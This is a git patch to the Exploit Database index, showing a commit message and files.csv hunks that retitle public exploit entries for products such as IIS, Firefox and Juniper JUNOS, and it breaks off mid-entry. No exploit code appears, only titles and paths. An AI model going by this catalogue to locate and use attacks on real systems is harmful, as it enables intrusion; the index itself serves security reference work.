From 3cfdd1cc274b81234948027f683afb2408328e4f Mon Sep 17 00:00:00 2001 From: Offensive Security Date: Thu, 12 Oct 2017 05:01:34 +0000 Subject: [PATCH] DB: 2017-10-12 5 new exploits MultiTheftAuto 0.5 patch 1 - Server Crash and MOTD Deletion Exploit MultiTheftAuto 0.5 patch 1 - Server Crash / MOTD Deletion Exploit Amaya Web Editor 11.0 - XML and HTML parser Vulnerabilities Amaya Web Editor 11.0 - XML / HTML Parser Vulnerabilities Apple Safari & QuickTime - Denial of Service Apple Safari / QuickTime - Denial of Service Real Helix DNA - RTSP and SETUP Request Handler Vulnerabilities Real Helix DNA - RTSP / SETUP Request Handler Vulnerabilities Juniper Networks JUNOS 7.1.1 - Malformed TCP Packet Denial of Service and Unspecified Vulnerabilities Juniper Networks JUNOS 7.1.1 - Malformed TCP Packet Denial of Service / Unspecified Vulnerabilities Novell Netware - CIFS And AFP Remote Memory Consumption Denial of Service Novell Netware - CIFS and AFP Remote Memory Consumption Denial of Service Multiple Adobe Products - XML External Entity And XML Injection Vulnerabilities Multiple Adobe Products - XML External Entity / XML Injection Vulnerabilities Ghost Recon Advanced Warfighter - Integer Overflow and Array Indexing Overflow Ghost Recon Advanced Warfighter - Integer Overflow / Array Indexing Overflow Webkit (Apple Safari < 4.1.2/5.0.2 & Google Chrome < 5.0.375.125) - Memory Corruption Webkit (Apple Safari < 4.1.2/5.0.2 / Google Chrome < 5.0.375.125) - Memory Corruption Mozilla Firefox - Interleaving document.write and appendChild Denial of Service Mozilla Firefox - Interleaving 'document.write' / 'appendChild' Denial of Service Avirt Mail 4.0/4.2 - 'Mail From:' and 'Rcpt to:' Denial of Service Avirt Mail 4.0/4.2 - 'Mail From:' / 'Rcpt to:' Denial of Service BRS Webweaver 1.0 4 - POST and HEAD Denial of Service BRS Webweaver 1.0 4 - POST / HEAD Denial of Service Microsoft IIS 5.0 - WebDAV PROPFIND and SEARCH Method Denial of Service Microsoft IIS 5.0 - WebDAV PROPFIND / SEARCH Method Denial of Service Microsoft Internet Explorer 5.0.1 - Malformed IMG and XML Parsing Denial of Service Microsoft Internet Explorer 5.0.1 - Malformed .IMG / .XML Parsing Denial of Service Extended Module Player (xmp) 2.5.1 - 'oxm.c' And 'dtt_load.c' Multiple Local Buffer Overflow Vulnerabilities Extended Module Player (xmp) 2.5.1 - 'oxm.c' / 'dtt_load.c' Multiple Local Buffer Overflow Vulnerabilities Microsoft Internet Explorer 9/10 - CFormElement Use-After-Free and Memory Corruption (PoC) (MS14-035) Microsoft Internet Explorer 9/10 - CFormElement Use-After-Free / Memory Corruption (PoC) (MS14-035) Ubisoft Ghost Recon Advanced Warfighter - Integer Overflow and Array Indexing Overflow Ubisoft Ghost Recon Advanced Warfighter - Integer Overflow / Array Indexing Overflow Adobe Photoshop CC & Bridge CC - '.iff' Parsing Memory Corruption Adobe Photoshop CC / Bridge CC - '.iff' Parsing Memory Corruption Nitro Pro 10.5.7.32 & Nitro Reader 5.5.3.1 - Heap Memory Corruption Nitro Pro 10.5.7.32 / Nitro Reader 5.5.3.1 - Heap Memory Corruption Microsoft Windows - GDI+ EMR_EXTTEXTOUTA and EMR_POLYTEXTOUTA Heap Based Buffer Overflow (MS16-097) Microsoft Windows - GDI+ EMR_EXTTEXTOUTA / EMR_POLYTEXTOUTA Heap Based Buffer Overflow (MS16-097) Google Android - 'cfp_ropp_new_key_reenc' and 'cfp_ropp_new_key' RKP Memory Corruption Google Android - 'cfp_ropp_new_key_reenc' / 'cfp_ropp_new_key' RKP Memory Corruption Microsoft Windows Kernel - Registry Hive Loading Crashes in nt!nt!HvpGetBinMemAlloc and nt!ExpFindAndRemoveTagBigPages (MS17-017) Microsoft Windows Kernel - Registry Hive Loading Crashes in nt!nt!HvpGetBinMemAlloc / nt!ExpFindAndRemoveTagBigPages (MS17-017) Microsoft Windows 7 Kernel - Pool-Based Out-of-Bounds Reads Due to bind() Implementation Bugs in afd.sys and tcpip.sys Microsoft Windows 7 Kernel - Pool-Based Out-of-Bounds Reads Due to bind() Implementation Bugs in afd.sys / tcpip.sys binutils 2.29.51.20170921 - 'read_1_byte' Heap-Based Buffer Overflow BSD & Linux umount - Privilege Escalation BSD / Linux - 'umount' Privilege Escalation BSD & Linux lpr - Privilege Escalation BSD / Linux - 'lpr' Privilege Escalation DelphiTurk CodeBank 3.1 - Local 'Username' and Password Disclosure DelphiTurk CodeBank 3.1 - Local Username and Password Disclosure SystemTap 1.0/1.1 - '__get_argv()' and '__get_compat_argv()' Local Memory Corruption SystemTap 1.0/1.1 - '__get_argv()' / '__get_compat_argv()' Local Memory Corruption Filemaker Pro 13.03 & Advanced 12.04 - Login Bypass / Privilege Escalation Filemaker Pro 13.03 / Advanced 12.04 - Login Bypass / Privilege Escalation ASX to MP3 converter < 3.1.3.7 - Stack Overflow (DEP Bypass) ASX to MP3 converter < 3.1.3.7 - '.asx' Stack Overflow (DEP Bypass) ASX to MP3 3.1.3.7 - '.m3u' Buffer Overflow Microsoft Windows - WINS Vulnerability and OS/SP Scanner Microsoft Windows - WINS Vulnerability + OS/SP Scanner Mozilla Firefox 3.6.8 < 3.6.11 - Interleaving document.write and appendChild Exploit (From the Wild) Mozilla Firefox 3.6.8 < 3.6.11 - Interleaving 'document.write' / 'appendChild' Exploit Mozilla Firefox - Interleaving document.write and appendChild Exploit (Metasploit) Mozilla Firefox - Interleaving 'document.write' / 'appendChild' Exploit (Metasploit) Quest InTrust 10.4.x - ReportTree and SimpleTree Classes Quest InTrust 10.4.x - ReportTree / SimpleTree Classes SunOS 4.1.3 - LD_LIBRARY_PATH and LD_OPTIONS SunOS 4.1.3 - LD_LIBRARY_PATH / LD_OPTIONS Exploit RedHat Linux 5.1 & Caldera OpenLinux Standard 1.2 - Mountd RedHat Linux 5.1 / Caldera OpenLinux Standard 1.2 - Mountd Microsoft IIS 3.0/4.0 - Using ASP And FSO To Read Server Files Microsoft IIS 3.0/4.0 - Using ASP and FSO To Read Server Files tcpdump 3.4 - Protocol Four and Zero Header Length tcpdump 3.4 - Protocol Four / Zero Header Length Symantec pcAnywhere 12.5.0 - Login and Password Field Buffer Overflow Symantec pcAnywhere 12.5.0 - 'Login' / 'Password' Buffer Overflow Microsoft Internet Explorer 5.0/4.0.1 - IFRAME Exploit Microsoft Internet Explorer 5.0/4.0.1 - iFrame Exploit Internet Security Systems ICECap Manager 2.0.23 - Default 'Username' and Password Internet Security Systems ICECap Manager 2.0.23 - Default Username and Password Technote 2000/2001 - 'Filename' Parameter Command Execution And File Disclosure Technote 2000/2001 - 'Filename' Parameter Command Execution and File Disclosure WFTPD 3.0 - 'RETR' and 'CWD' Buffer Overflow WFTPD 3.0 - 'RETR' / 'CWD' Buffer Overflow EFTP Server 2.0.7.337 - Directory and File Existence EFTP Server 2.0.7.337 - Directory Existence / File Existence Bajie HTTP Server 0.95 - Example Scripts And Servlets Cross-Site Scripting Bajie HTTP Server 0.95 - Example Scripts and Servlets Cross-Site Scripting InternetNow ProxyNow 2.6/2.75 - Multiple Stack and Heap Overflow Vulnerabilities InternetNow ProxyNow 2.6/2.75 - Multiple Stack / Heap Overflow Vulnerabilities Microsoft Windows XP - Help And Support Center Interface Spoofing Microsoft Windows XP - Help and Support Center Interface Spoofing BigAnt Server 2.97 - SCH And DUPF Buffer Overflow (Metasploit) BigAnt Server 2.97 - SCH / DUPF Buffer Overflow (Metasploit) Adobe Acrobat 7.0 / Adobe Reader 7.0 - File Existence and Disclosure Adobe Acrobat 7.0 / Adobe Reader 7.0 - File Existence / File Disclosure Apache 2.2.6 mod_negotiation - HTML Injection and HTTP Response Splitting Apache 2.2.6 mod_negotiation - HTML Injection / HTTP Response Splitting 3D-FTP 8.01 - 'LIST' and 'MLSD' Directory Traversal 3D-FTP 8.01 - 'LIST' / 'MLSD' Directory Traversal Apache Tomcat 7.0.4 - 'sort' and 'orderBy' Parameters Cross-Site Scripting Apache Tomcat 7.0.4 - 'sort' / 'orderBy' Cross-Site Scripting Apple macOS HelpViewer 10.12.1 - XSS Leads to Arbitrary File Execution and Arbitrary File Read Apple macOS HelpViewer 10.12.1 - XSS Leads to Arbitrary File Execution / Arbitrary File Read Github Enterprise - Default Session Secret And Deserialization (Metasploit) Github Enterprise - Default Session Secret and Deserialization (Metasploit) VX Search Enterprise 10.1.12 - Buffer Overflow QUOTE&ORDERING SYSTEM 1.0 - 'ordernum' Multiple Vulnerabilities Quote&Ordering System 1.0 - 'ordernum' Multiple Vulnerabilities Joomla! Component Flash uploader 2.5.1 - Remote File Inclusion Joomla! Component Flash Uploader 2.5.1 - Remote File Inclusion FlexPHPNews 0.0.6 & PRO - Authentication Bypass FlexPHPNews 0.0.6 / PRO - Authentication Bypass click&rank - SQL Injection / Cross-Site Scripting Click&Rank - SQL Injection / Cross-Site Scripting WordPress Core & MU & Plugins - 'admin.php' Privileges Unchecked / Multiple Information Disclosures WordPress Core / MU / Plugins - 'admin.php' Privileges Unchecked / Multiple Information Disclosures PRE HOTELS&RESORTS MANAGEMENT SYSTEM - Authentication Bypass Pre Hotels&Resorts Management System - Authentication Bypass PHP-Nuke CMS - (Survey and Poll) SQL Injection PHP-Nuke CMS (Survey and Poll) - SQL Injection 60 cycleCMS 2.5.2 - Cross-Site Request Forgery (Change 'Username' and Password) 60 cycleCMS 2.5.2 - Cross-Site Request Forgery (Change Username and Password) XT-Commerce 1.0 Beta 1 - Pass / Creat and Download Backup XT-Commerce 1.0 Beta 1 - Pass / Create and Download Backup Allomani Songs & Clips Script 2.7.0 - Cross-Site Request Forgery (Add Admin) Allomani Songs & Clips 2.7.0 - Cross-Site Request Forgery (Add Admin) Sun i-Runbook 2.5.2 - Directory And File Content Disclosure Sun i-Runbook 2.5.2 - Directory and File Content Disclosure DUclassmate 1.x - account.asp MM-recordId Parameter Arbitrary Password Modification DUclassmate 1.x - 'account.asp MM-recordId' Arbitrary Password Modification DUforum 3.x - messages.asp FOR_ID Parameter SQL Injection DUforum 3.x - messageDetail.asp MSG_ID Parameter SQL Injection DUforum 3.x - 'messages.asp FOR_ID' SQL Injection DUforum 3.x - 'messageDetail.asp MSG_ID' SQL Injection SquirrelMail G/PGP Encryption Plugin 2.0/2.1 - Access Validation And Input Validation SquirrelMail G/PGP Encryption Plugin 2.0/2.1 - Access Validation / Input Validation JAF CMS 4.0.0 RC2 - 'website' and 'main_dir' Parameters Multiple Remote File Inclusion JAF CMS 4.0.0 RC2 - 'website' / 'main_dir' Multiple Remote File Inclusion WordPress Plugin WP BackupPlus - Database And Files Backup Download WordPress Plugin WP BackupPlus - Database and Files Backup Download WebsiteKit Gbplus - Name and Body Fields HTML Injection Vulnerabilities WebsiteKit Gbplus - 'Name' / 'Body' HTML Injection Gogs - (users and repos q pararm) SQL Injection Gogs - users and repos q SQL Injection WebFileExplorer 3.6 - 'user' and 'pass' SQL Injection WebFileExplorer 3.6 - 'user' / 'pass' SQL Injection Joomla! Component 'com_tree' - 'key' Parameter SQL Injection Joomla! Component com_tree - 'key' Parameter SQL Injection Ilient SysAid 8.5.5 - Multiple Cross-Site Scripting and HTML Injection Vulnerabilities Ilient SysAid 8.5.5 - Multiple Cross-Site Scripting / HTML Injection Vulnerabilities WeBid - Multiple Cross-Site Scripting And LDAP Injection Vulnerabilities WeBid - Multiple Cross-Site Scripting / LDAP Injection Vulnerabilities Squiz CMS - Multiple Cross-Site Scripting and XML External Entity Injection Vulnerabilities Squiz CMS - Multiple Cross-Site Scripting / XML External Entity Injection Vulnerabilities TOTOLINK Routers - Backdoor and Remote Code Execution (PoC) TOTOLINK Routers - Backdoor / Remote Code Execution (PoC) up.time 7.5.0 - Arbitrary File Disclose And Delete Exploit up.time 7.5.0 - Upload And Execute File Exploit up.time 7.5.0 - Arbitrary File Disclose and Delete Exploit up.time 7.5.0 - Upload and Execute Exploit Wildfly - WEB-INF and META-INF Information Disclosure via Filter Restriction Bypass Wildfly - 'WEB-INF' / 'META-INF' Information Disclosure via Filter Restriction Bypass WebKit - enqueuePageshowEvent and enqueuePopstateEvent Universal Cross-Site Scripting WebKit - 'enqueuePageshowEvent' / 'enqueuePopstateEvent' Universal Cross-Site Scripting WebKit - 'Document::prepareForDestruction' and 'CachedFrame' Universal Cross-Site Scripting WebKit - 'Document::prepareForDestruction' / 'CachedFrame' Universal Cross-Site Scripting WebKit JSC - 'JSObject::putInlineSlow and JSValue::putToPrimitive' Universal Cross-Site Scripting WebKit JSC - 'JSObject::putInlineSlow' / 'JSValue::putToPrimitive' Universal Cross-Site Scripting Trend Micro OfficeScan 11.0/XG (12.0) - Remote Code Execution (Metasploit) Trend Micro InterScan Messaging Security (Virtual Appliance) - Remote Code Execution (Metasploit) --- files.csv | 173 ++++++++++++------------ platforms/jsp/webapps/42939.txt | 2 +- platforms/jsp/webapps/42940.txt | 2 +- platforms/linux/dos/42970.txt | 112 ++++++++++++++++ platforms/php/webapps/42971.rb | 216 ++++++++++++++++++++++++++++++ platforms/php/webapps/42972.rb | 130 ++++++++++++++++++ platforms/windows/local/42974.py | 85 ++++++++++++ platforms/windows/remote/42973.py | 103 ++++++++++++++ 8 files changed, 737 insertions(+), 86 deletions(-) create mode 100755 platforms/linux/dos/42970.txt create mode 100755 platforms/php/webapps/42971.rb create mode 100755 platforms/php/webapps/42972.rb create mode 100755 platforms/windows/local/42974.py create mode 100755 platforms/windows/remote/42973.py diff --git a/files.csv b/files.csv index e329d3c85..1e587ed75 100644 --- a/files.csv +++ b/files.csv @@ -227,7 +227,7 @@ id,file,description,date,author,platform,type,port 1220,platforms/windows/dos/1220.pl,"Fastream NETFile Web Server 7.1.2 - 'HEAD' Denial of Service",2005-09-16,karak0rsan,windows,dos,0 1222,platforms/windows/dos/1222.pl,"MCCS (Multi-Computer Control Systems) Command - Denial of Service",2005-09-19,basher13,windows,dos,0 1233,platforms/multiple/dos/1233.html,"Mozilla Firefox 1.0.7 - Integer Overflow Denial of Service",2005-09-26,"Georgi Guninski",multiple,dos,0 -1235,platforms/windows/dos/1235.c,"MultiTheftAuto 0.5 patch 1 - Server Crash and MOTD Deletion Exploit",2005-09-26,"Luigi Auriemma",windows,dos,0 +1235,platforms/windows/dos/1235.c,"MultiTheftAuto 0.5 patch 1 - Server Crash / MOTD Deletion Exploit",2005-09-26,"Luigi Auriemma",windows,dos,0 1239,platforms/windows/dos/1239.c,"Virtools Web Player 3.0.0.100 - Buffer Overflow Denial of Service",2005-10-02,"Luigi Auriemma",windows,dos,0 1246,platforms/windows/dos/1246.pl,"RBExplorer 1.0 - Hijacking Command Denial of Service",2005-10-11,basher13,windows,dos,0 1251,platforms/windows/dos/1251.pl,"TYPSoft FTP Server 1.11 - 'RETR' Denial of Service",2005-10-14,wood,windows,dos,0 @@ -927,7 +927,7 @@ id,file,description,date,author,platform,type,port 7887,platforms/windows/dos/7887.pl,"Zinf Audio Player 2.2.1 - '.pls' Stack Overflow (PoC)",2009-01-27,Hakxer,windows,dos,0 7889,platforms/windows/dos/7889.pl,"Zinf Audio Player 2.2.1 - '.m3u' Local Heap Overflow (PoC)",2009-01-27,Hakxer,windows,dos,0 7890,platforms/windows/dos/7890.pl,"Zinf Audio Player 2.2.1 - '.gqmpeg' Buffer Overflow (PoC)",2009-01-27,Hakxer,windows,dos,0 -7902,platforms/windows/dos/7902.txt,"Amaya Web Editor 11.0 - XML and HTML parser Vulnerabilities",2009-01-28,"Core Security",windows,dos,0 +7902,platforms/windows/dos/7902.txt,"Amaya Web Editor 11.0 - XML / HTML Parser Vulnerabilities",2009-01-28,"Core Security",windows,dos,0 7904,platforms/windows/dos/7904.pl,"Thomson mp3PRO Player/Encoder - '.m3u' Crash (PoC)",2009-01-29,Hakxer,windows,dos,0 7906,platforms/windows/dos/7906.pl,"Amaya Web Editor 11.0 - Remote Buffer Overflow (PoC)",2009-01-29,Stack,windows,dos,0 7934,platforms/windows/dos/7934.py,"Spider Player 2.3.9.5 - '.asx' Off-by-One Crash",2009-01-30,Houssamix,windows,dos,0 @@ -1073,7 +1073,7 @@ id,file,description,date,author,platform,type,port 8899,platforms/windows/dos/8899.txt,"SAP GUI 6.4 - ActiveX (Accept) Remote Buffer Overflow (PoC)",2009-06-08,DSecRG,windows,dos,0 8940,platforms/multiple/dos/8940.pl,"Asterisk IAX2 - Attacked IAX Fuzzer Resource Exhaustion (Denial of Service)",2009-06-12,"Blake Cornell",multiple,dos,0 8955,platforms/linux/dos/8955.pl,"LinkLogger 2.4.10.15 - (syslog) Denial of Service",2009-06-15,h00die,linux,dos,0 -8957,platforms/multiple/dos/8957.txt,"Apple Safari & QuickTime - Denial of Service",2009-06-15,"Thierry Zoller",multiple,dos,0 +8957,platforms/multiple/dos/8957.txt,"Apple Safari / QuickTime - Denial of Service",2009-06-15,"Thierry Zoller",multiple,dos,0 8960,platforms/linux/dos/8960.py,"Apple QuickTime - CRGN Atom Local Crash",2009-06-15,webDEViL,linux,dos,0 8964,platforms/hardware/dos/8964.txt,"NETGEAR DG632 Router - Remote Denial of Service",2009-06-15,"Tom Neaves",hardware,dos,0 8971,platforms/windows/dos/8971.pl,"Carom3D 5.06 - Unicode Buffer Overrun/Denial of Service",2009-06-16,LiquidWorm,windows,dos,0 @@ -1116,7 +1116,7 @@ id,file,description,date,author,platform,type,port 9178,platforms/windows/dos/9178.pl,"MixSense 1.0.0.1 DJ Studio - '.mp3' Crash",2009-07-16,prodigy,windows,dos,0 9189,platforms/windows/dos/9189.pl,"Streaming Audio Player 0.9 - 'skin' Local Stack Overflow (PoC) (SEH)",2009-07-17,"ThE g0bL!N",windows,dos,0 9192,platforms/windows/dos/9192.pl,"Soritong MP3 Player 1.0 - 'SKIN' Local Stack Overflow (PoC) (SEH)",2009-07-17,"ThE g0bL!N",windows,dos,0 -9198,platforms/multiple/dos/9198.txt,"Real Helix DNA - RTSP and SETUP Request Handler Vulnerabilities",2009-07-17,"Core Security",multiple,dos,0 +9198,platforms/multiple/dos/9198.txt,"Real Helix DNA - RTSP / SETUP Request Handler Vulnerabilities",2009-07-17,"Core Security",multiple,dos,0 9200,platforms/windows/dos/9200.pl,"EpicVJ 1.2.8.0 - '.mpl' / '.m3u' Local Heap Overflow (PoC)",2009-07-20,hack4love,windows,dos,0 9206,platforms/freebsd/dos/9206.c,"FreeBSD 7.2 - (pecoff executable) Local Denial of Service",2009-07-20,"Shaun Colley",freebsd,dos,0 9212,platforms/windows/dos/9212.pl,"Acoustica MP3 Audio Mixer 2.471 - '.sgp' Crash",2009-07-20,prodigy,windows,dos,0 @@ -1242,7 +1242,7 @@ id,file,description,date,author,platform,type,port 10068,platforms/windows/dos/10068.rb,"Microsoft Windows Server 2000 < 2008 - Embedded OpenType Font Engine Remote Code Execution (MS09-065) (Metasploit)",2009-11-12,"H D Moore",windows,dos,0 10073,platforms/windows/dos/10073.py,"XM Easy Personal FTP 5.8 - Denial of Service",2009-10-02,PLATEN,windows,dos,21 10077,platforms/multiple/dos/10077.txt,"OpenLDAP 2.3.39 - MODRDN Remote Denial of Service",2009-11-09,"Ralf Haferkamp",multiple,dos,389 -33476,platforms/hardware/dos/33476.pl,"Juniper Networks JUNOS 7.1.1 - Malformed TCP Packet Denial of Service and Unspecified Vulnerabilities",2010-01-07,anonymous,hardware,dos,0 +33476,platforms/hardware/dos/33476.pl,"Juniper Networks JUNOS 7.1.1 - Malformed TCP Packet Denial of Service / Unspecified Vulnerabilities",2010-01-07,anonymous,hardware,dos,0 10091,platforms/windows/dos/10091.txt,"XLPD 3.0 - Remote Denial of Service",2009-10-06,"Francis Provencher",windows,dos,515 10092,platforms/windows/dos/10092.txt,"Yahoo! Messenger 9.0.0.2162 - 'YahooBridgeLib.dll' ActiveX Control Remote Denial of Service",2009-11-12,HACKATTACK,windows,dos,0 10100,platforms/windows/dos/10100.py,"FTPDMIN 0.96 - 'LIST' Remote Denial of Service",2007-03-20,shinnai,windows,dos,21 @@ -1317,7 +1317,7 @@ id,file,description,date,author,platform,type,port 10920,platforms/windows/dos/10920.cpp,"VirtualDJ Trial 6.0.6 'New Year Edition' - '.m3u' Exploit",2010-01-02,"fl0 fl0w",windows,dos,0 10947,platforms/hardware/dos/10947.txt,"Facebook for iPhone - Persistent Cross-Site Scripting Denial of Service",2010-01-03,marco_,hardware,dos,0 10960,platforms/multiple/dos/10960.pl,"Google Chrome 4.0.249.30 - Denial of Service (PoC)",2010-01-03,anonymous,multiple,dos,0 -11009,platforms/multiple/dos/11009.pl,"Novell Netware - CIFS And AFP Remote Memory Consumption Denial of Service",2010-01-05,"Francis Provencher",multiple,dos,0 +11009,platforms/multiple/dos/11009.pl,"Novell Netware - CIFS and AFP Remote Memory Consumption Denial of Service",2010-01-05,"Francis Provencher",multiple,dos,0 11020,platforms/windows/dos/11020.pl,"GOM Audio - Local Crash (PoC)",2010-01-06,applicationlayer,windows,dos,0 11021,platforms/windows/dos/11021.txt,"FlashGet 3.x - IEHelper Remote Execution (PoC)",2010-01-06,superli,windows,dos,0 11034,platforms/windows/dos/11034.txt,"Microsoft HTML Help Compiler (hhc.exe) - Buffer Overflow (PoC)",2010-01-06,s4squatch,windows,dos,0 @@ -1395,7 +1395,7 @@ id,file,description,date,author,platform,type,port 11492,platforms/windows/dos/11492.html,"Rising Online Virus Scanner 22.0.0.5 - ActiveX Control Stack Overflow (Denial of Service)",2010-02-18,wirebonder,windows,dos,0 11499,platforms/ios/dos/11499.pl,"iOS FileApp 1.7 - Remote Denial of Service",2010-02-18,Ale46,ios,dos,0 11520,platforms/ios/dos/11520.pl,"iOS iFTPStorage 1.2 - Remote Denial of Service",2010-02-22,Ale46,ios,dos,0 -11529,platforms/multiple/dos/11529.txt,"Multiple Adobe Products - XML External Entity And XML Injection Vulnerabilities",2010-02-22,"Roberto Suggi Liverani",multiple,dos,0 +11529,platforms/multiple/dos/11529.txt,"Multiple Adobe Products - XML External Entity / XML Injection Vulnerabilities",2010-02-22,"Roberto Suggi Liverani",multiple,dos,0 11531,platforms/windows/dos/11531.pl,"Microsoft Windows Media Player 11.0.5721.5145 - '.mpg' Buffer Overflow",2010-02-22,cr4wl3r,windows,dos,0 11532,platforms/windows/dos/11532.html,"Winamp 5.57 - (Browser) IE Denial of Service",2010-02-22,cr4wl3r,windows,dos,0 11533,platforms/windows/dos/11533.pl,"Nero Burning ROM 9.4.13.2 - (iso compilation) Local Buffer Invasion (PoC)",2010-02-22,LiquidWorm,windows,dos,0 @@ -1622,7 +1622,7 @@ id,file,description,date,author,platform,type,port 14185,platforms/multiple/dos/14185.py,"ISC DHCPD - Denial of Service",2010-07-03,sid,multiple,dos,0 14236,platforms/windows/dos/14236.txt,"Sun Java Web Server 7.0 u7 - Admin Interface Denial of Service",2010-07-06,muts,windows,dos,8800 14268,platforms/multiple/dos/14268.txt,"Qt 4.6.3 - 'QSslSocketBackendPrivate::transmit()' Denial of Service",2010-07-08,"Luigi Auriemma",multiple,dos,0 -14286,platforms/windows/dos/14286.txt,"Ghost Recon Advanced Warfighter - Integer Overflow and Array Indexing Overflow",2010-07-08,"Luigi Auriemma",windows,dos,0 +14286,platforms/windows/dos/14286.txt,"Ghost Recon Advanced Warfighter - Integer Overflow / Array Indexing Overflow",2010-07-08,"Luigi Auriemma",windows,dos,0 14282,platforms/windows/dos/14282.txt,"Microsoft Windows - 'cmd.exe' Unicode Buffer Overflow (SEH)",2010-07-08,bitform,windows,dos,0 14290,platforms/windows/dos/14290.py,"MP3 Cutter 1.5 - Denial of Service",2010-07-09,"Prashant Uniyal",windows,dos,0 15307,platforms/windows/dos/15307.py,"HP Data Protector Media Operations 6.11 - HTTP Server Remote Integer Overflow Denial of Service",2010-10-23,d0lc3,windows,dos,0 @@ -1709,7 +1709,7 @@ id,file,description,date,author,platform,type,port 14938,platforms/windows/dos/14938.txt,"Internet Download Accelerator 5.8 - Remote Buffer Overflow (PoC)",2010-09-07,eidelweiss,windows,dos,0 14947,platforms/bsd/dos/14947.txt,"FreeBSD 8.1/7.3 - vm.pmap Kernel Local Race Condition",2010-09-08,"Maksymilian Arciemowicz",bsd,dos,0 14949,platforms/windows/dos/14949.py,"Mozilla Firefox 3.6.3 - XSLT Sort Remote Code Execution",2010-09-09,Abysssec,windows,dos,0 -14967,platforms/windows/dos/14967.txt,"Webkit (Apple Safari < 4.1.2/5.0.2 & Google Chrome < 5.0.375.125) - Memory Corruption",2010-09-10,"Jose A. Vazquez",windows,dos,0 +14967,platforms/windows/dos/14967.txt,"Webkit (Apple Safari < 4.1.2/5.0.2 / Google Chrome < 5.0.375.125) - Memory Corruption",2010-09-10,"Jose A. Vazquez",windows,dos,0 14971,platforms/windows/dos/14971.py,"Microsoft Word 2007 SP2 - sprmCMajority Buffer Overflow",2010-09-11,Abysssec,windows,dos,0 14974,platforms/windows/dos/14974.txt,"HP Data Protector Media Operations 6.11 - Multiple Modules Null Pointer Dereference Denial of Service",2010-09-11,d0lc3,windows,dos,0 14987,platforms/windows/dos/14987.py,"Kingsoft AntiVirus 2010.04.26.648 - Kernel Buffer Overflow",2010-09-13,"Lufeng Li",windows,dos,0 @@ -1769,7 +1769,7 @@ id,file,description,date,author,platform,type,port 15319,platforms/windows/dos/15319.pl,"Apache 2.2 (Windows) - Local Denial of Service",2010-10-26,fb1h2s,windows,dos,0 15334,platforms/windows/dos/15334.py,"MinaliC WebServer 1.0 - Denial of Service",2010-10-27,"John Leitch",windows,dos,0 15426,platforms/windows/dos/15426.txt,"Adobe Flash - ActionIf Integer Denial of Service",2010-11-05,"Matthew Bergin",windows,dos,0 -15341,platforms/multiple/dos/15341.html,"Mozilla Firefox - Interleaving document.write and appendChild Denial of Service",2010-10-28,"Daniel Veditz",multiple,dos,0 +15341,platforms/multiple/dos/15341.html,"Mozilla Firefox - Interleaving 'document.write' / 'appendChild' Denial of Service",2010-10-28,"Daniel Veditz",multiple,dos,0 15342,platforms/multiple/dos/15342.html,"Mozilla Firefox - (Simplified) Memory Corruption (PoC)",2010-10-28,extraexploit,multiple,dos,0 15346,platforms/multiple/dos/15346.c,"Platinum SDK Library - post upnp sscanf Buffer Overflow",2010-10-28,n00b,multiple,dos,0 15356,platforms/windows/dos/15356.pl,"yPlay 2.4.5 - Denial of Service",2010-10-30,"MOHAMED ABDI",windows,dos,0 @@ -2451,7 +2451,7 @@ id,file,description,date,author,platform,type,port 20304,platforms/windows/dos/20304.txt,"Omnicron OmniHTTPd 1.1/2.0 Alpha 1 - 'visiadmin.exe' Denial of Service",1999-06-05,"Valentin Perelogin",windows,dos,0 20307,platforms/windows/dos/20307.txt,"Hilgraeve HyperTerminal 6.0 - Telnet Buffer Overflow",2000-10-18,"Ussr Labs",windows,dos,0 20310,platforms/windows/dos/20310.txt,"Microsoft IIS 4.0 - Pickup Directory Denial of Service",2000-02-15,Valentijn,windows,dos,0 -20311,platforms/windows/dos/20311.c,"Avirt Mail 4.0/4.2 - 'Mail From:' and 'Rcpt to:' Denial of Service",2000-10-23,Martin,windows,dos,0 +20311,platforms/windows/dos/20311.c,"Avirt Mail 4.0/4.2 - 'Mail From:' / 'Rcpt to:' Denial of Service",2000-10-23,Martin,windows,dos,0 20323,platforms/hardware/dos/20323.txt,"Cisco IOS 12 - Software '?/' HTTP Request Denial of Service",2000-10-25,"Alberto Solino",hardware,dos,0 20328,platforms/hardware/dos/20328.txt,"Intel InBusiness eMail Station 1.4.87 - Denial of Service",2000-10-20,"Knud Erik Højgaard",hardware,dos,0 20331,platforms/hardware/dos/20331.c,"Ascend R 4.5 Ci12 - Denial of Service (C)",1998-03-16,Rootshell,hardware,dos,0 @@ -2868,14 +2868,14 @@ id,file,description,date,author,platform,type,port 22637,platforms/windows/dos/22637.pl,"Prishtina FTP Client 1.x - Remote Denial of Service",2003-05-23,DHGROUP,windows,dos,0 22638,platforms/irix/dos/22638.txt,"IRIX 5.x/6.x - MediaMail HOME Environment Variable Buffer Overflow",2003-05-23,bazarr@ziplip.com,irix,dos,0 22647,platforms/hardware/dos/22647.txt,"D-Link DI-704P - Syslog.HTM Denial of Service",2003-05-26,"Chris R",hardware,dos,0 -22650,platforms/multiple/dos/22650.py,"BRS Webweaver 1.0 4 - POST and HEAD Denial of Service",2003-05-26,euronymous,multiple,dos,0 +22650,platforms/multiple/dos/22650.py,"BRS Webweaver 1.0 4 - POST / HEAD Denial of Service",2003-05-26,euronymous,multiple,dos,0 22653,platforms/windows/dos/22653.py,"Smadav Anti Virus 9.1 - Crash (PoC)",2012-11-12,"Mada R Perdhana",windows,dos,0 22655,platforms/windows/dos/22655.txt,"Microsoft Publisher 2013 - Crash (PoC)",2012-11-12,coolkaveh,windows,dos,0 22660,platforms/php/dos/22660.txt,"PostNuke Phoenix 0.72x - Rating System Denial of Service",2003-05-26,"Lorenzo Manuel Hernandez Garcia-Hierro",php,dos,0 22666,platforms/windows/dos/22666.txt,"Softrex Tornado WWW-Server 1.2 - Buffer Overflow",2003-05-28,D4rkGr3y,windows,dos,0 22667,platforms/windows/dos/22667.txt,"BaSoMail 1.24 - POP3 Server Denial of Service",2003-05-28,"Ziv Kamir",windows,dos,0 22668,platforms/windows/dos/22668.txt,"BaSoMail 1.24 - SMTP Server Command Buffer Overflow",2003-05-28,"Ziv Kamir",windows,dos,0 -22670,platforms/windows/dos/22670.c,"Microsoft IIS 5.0 - WebDAV PROPFIND and SEARCH Method Denial of Service",2003-05-28,Neo1,windows,dos,0 +22670,platforms/windows/dos/22670.c,"Microsoft IIS 5.0 - WebDAV PROPFIND / SEARCH Method Denial of Service",2003-05-28,Neo1,windows,dos,0 22679,platforms/windows/dos/22679.txt,"Microsoft Visio 2010 - Crash (PoC)",2012-11-13,coolkaveh,windows,dos,0 22680,platforms/windows/dos/22680.txt,"IrfanView - '.RLE' Image Decompression Buffer 